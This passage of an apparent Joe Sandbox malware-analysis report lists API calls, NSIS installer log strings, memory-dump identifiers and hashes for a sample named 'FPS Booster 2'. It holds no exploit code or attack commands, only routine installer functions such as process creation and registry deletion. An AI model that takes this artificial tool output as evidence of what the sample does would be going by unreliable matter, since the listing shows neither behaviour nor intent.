                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                • String ID:
                                                • API String ID: 2740478559-0
                                                • Opcode ID: 471e7f8fc2b920915949bdd7b41082774f496188afb4edabac252d6a905c9898
                                                • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                • Opcode Fuzzy Hash: 471e7f8fc2b920915949bdd7b41082774f496188afb4edabac252d6a905c9898
                                                • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                APIs
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D70,76F923A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                Strings
                                                • Exec: success ("%s"), xrefs: 00402263
                                                • Exec: command="%s", xrefs: 00402241
                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                • API String ID: 2014279497-3433828417
                                                • Opcode ID: 606aa0f624e16cfd08a3d3497b582caa03978367d61ff0107b1f05178c662554
                                                • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                • GetMessagePos.USER32 ref: 0040489D
                                                • ScreenToClient.USER32(?,?), ref: 004048B5
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                • MulDiv.KERNEL32(000696B0,00000064,0006B7A0), ref: 00403295
                                                • wsprintfW.USER32 ref: 004032A5
                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                Strings
                                                • verifying installer: %d%%, xrefs: 0040329F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 6e71b36604eb8168b9de070626c23bed7d900371b4c5136878c27d07ffa20f21
                                                • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":
                                                • API String ID: 589700163-165019052
                                                • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                APIs
                                                  • Part of subcall function 6FFB1E34: lstrcpynW.KERNEL32(?,?,6FFB1053,?,6FFB1053,?), ref: 6FFB1E62
                                                  • Part of subcall function 6FFB1E34: GlobalFree.KERNELBASE ref: 6FFB1E72
                                                • SHBrowseForFolderW.SHELL32(?), ref: 6FFB10B4
                                                  • Part of subcall function 6FFB1E83: GlobalAlloc.KERNELBASE(00000040,?,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1E99
                                                  • Part of subcall function 6FFB1E83: lstrcpynW.KERNEL32(00000004,00000104,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1EAF
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Globallstrcpyn$AllocBrowseFolderFree
                                                • String ID: E$error
                                                • API String ID: 1025582028-2359134700
                                                • Opcode ID: 1d37399892a915d26e0d4735e66ec77ab2fa821abcb7aa644d48759b5007fe64
                                                • Instruction ID: 13cd765273713341a9985b0dfae0d388887d20c4a970b005ae563ecf7c93fa41
                                                • Instruction Fuzzy Hash: AB212C729152199BDB10DFA6C985BDE77B8AF08399F00415AE904E2240D734EB44CFA0
                                                APIs
                                                • GetDC.USER32(?), ref: 00402100
                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                • String ID: MS Shell Dlg
                                                • API String ID: 1599320355-76309092
                                                • Opcode ID: ccebd128bbe4e9bb6111c0dafa4c3d4753fa9787b5105a835a2bc2114a3fe238
                                                • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                APIs
                                                  • Part of subcall function 6E9E1581: GlobalAlloc.KERNELBASE(00000040,?,6E9E15BA,?,?,6E9E185F,?,6E9E1017), ref: 6E9E158B
                                                • lstrcpyW.KERNEL32(00000000,error,00000000,6E9E287B,00000000), ref: 6E9E1929
                                                • wsprintfW.USER32 ref: 6E9E1942
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: AllocGloballstrcpywsprintf
                                                • String ID: callback%d$error$s<u
                                                • API String ID: 2689062267-3671815815
                                                • Opcode ID: 970e5fdafc2ced97c4ae6d78fce13d4c7ad9f3d8b551645bac1afe82fdb26859
                                                • Instruction ID: 039d57cdafe9b1bb67e42715ce27192640535700bd6dc8ac21e90efb6bb1e60c
                                                • Instruction Fuzzy Hash: C1E0D870608410AB4653D7FAF84C9A936786F833397000960F709D6A61C711C6498E86
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000808,6E9E22A8,?,00000808), ref: 6E9E1967
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000808,6E9E22A8,?,00000808), ref: 6E9E196E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000808,6E9E22A8,?,00000808), ref: 6E9E1982
                                                • GetProcAddress.KERNEL32(6E9E22A8,00000000), ref: 6E9E1989
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E1992
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 42efff23daa4338021e624cbf6f8eb9d5970b104514be558a6dc9643c80691a5
                                                • Instruction ID: 9c88982d752259a2bd5090ca92f05ceddeb3b7f762b08a375d188b302dfdea49
                                                • Instruction Fuzzy Hash: 1DF0127210A534BBDA2056B78C4CCABFE9CDF4B2F6B110611F318911A086615D01DAF1
                                                APIs
                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                APIs
                                                • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                • wsprintfW.USER32 ref: 00404483
                                                • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: fbcd40c561807554bf51775529ac3d7756d0fb4ab7b9da1cf7b6b1c34415f23c
                                                • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                APIs
                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                • API String ID: 1697273262-1764544995
                                                • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                APIs
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                • String ID: CopyFiles "%s"->"%s"
                                                • API String ID: 2577523808-3778932970
                                                • Opcode ID: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                                • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                • Opcode Fuzzy Hash: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                                • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: lstrcatwsprintf
                                                • String ID: %02x%c$...
                                                • API String ID: 3065427908-1057055748
                                                • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
